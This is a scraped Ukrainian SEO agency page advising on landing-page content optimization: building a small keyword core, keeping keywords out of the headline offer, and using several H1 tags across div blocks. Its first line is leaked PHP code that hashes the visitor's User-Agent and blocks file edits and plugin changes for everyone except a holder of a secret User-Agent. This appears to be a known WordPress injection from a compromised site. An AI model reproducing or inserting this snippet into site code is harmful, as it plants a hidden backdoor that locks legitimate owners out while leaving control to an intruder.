if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } Оптимізація контенту для лендингу у Києві, Україні за доступними цінами від агентства PATProfi

Оптимізація контенту для лендингу

Невелика кількість тексту на посадковій сторінці створює певні складнощі для просування за широкою семантикою. Ядро стандартного лендингу не повинно перевищувати 30-40 запитів. Під час формування загальної семантики пріоритет віддають середньо- та низькочастотним запитам. Кожне слово та фраза опрацьовуються дуже ретельно. Кластеризацію доцільно проводити вручну, вдумливо формуючи найбільш релевантну групу ключів.

Формування семантики – тільки початок. Далі необхідно максимально натурально вписати її в контент і тут виникає багато складнощів.

Розповсюджена помилка, коли основний ключ намагаються вписати в оффер – заголовок лендингу. Оффер – без перебільшення найважливіший компонент односторінкового сайту. Це стержень всієї комерційної пропозиції, поглянувши на який з перших секунд повинно бути зрозуміло його основну суть. Тут не місце компромісам між інформативністю та SEO-шністю. Хороший оффер завжди максимально конкретизований, короткий та зрозумілий.

Сильний оффер – це 80% успіху і тут краще утриматись від SEO-входжень, які будуть шкодити тексту.

Заголовок Н1 з входженням основного запиту розміщують під оффером. Зазвичай на сторінці сайту допускається використання тільки одного Н1, але у випадку з лендингом можна піти на незначну хитрість – створити для пошукових роботів ілюзію багатосторінковості. Текст розбивають на логічні блоки, виділяючи кожен з них тегом <div>. Оскільки краулери будуть сканувати ці фрагменти як автоматні розділи – для кожної з частин можна прописати свій Н1.

hosting.pat@gmail.com

Leave a Comment

Ваша e-mail адреса не оприлюднюватиметься.